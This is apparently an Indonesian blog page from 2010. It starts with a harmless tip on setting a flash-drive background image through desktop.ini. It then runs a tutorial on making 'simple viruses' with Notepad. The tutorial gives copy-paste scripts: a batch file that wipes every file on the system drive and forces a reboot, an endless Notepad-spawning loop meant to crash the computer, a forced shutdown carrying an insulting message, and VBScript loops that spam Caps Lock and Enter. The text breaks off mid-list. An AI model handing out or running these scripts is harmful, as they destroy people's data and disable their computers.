pertama:
lu download image nya misal blablabla.jpg
usahain mormat filenya .jpg biar mudah gtuuu
trus simpen di flask nya!!!!
kedua:
copy file berikut ke "NOTEPAD"
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=nama gambarnya.jpg
IconArea_Text=0x00FFFFFF
note:yang warna merah diganti ma nama fotonya
ketiga:
simpen dengan nama DEKSTOP.INI di flask nya
jangan lupa type nya all files
tus di refres dah jaadiii taraaaaaaa
note lagi :
Kedua file tersebut, desktop.ini dan blabla.jpg harus terletak pada root flash dis...
Senin, 18 Oktober 2010
Senin, 11 Oktober 2010
tutor membuat simpel virus dengan notepad
cma buat virus dari notepad
ne copas aje ke notepad nya trus simpan dengan format vbs
contoh jail.vbs
silah kan copas kode berikut
credit by:http://cheatbtg-dark.blogspot.com/
bikin blue screen
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00Buka notepad terus2an sampe komputer crash
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO topMuncul pop up trus komputer shut down
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10Capslock terus2an
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loopEnter terus2an
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loopBackspace...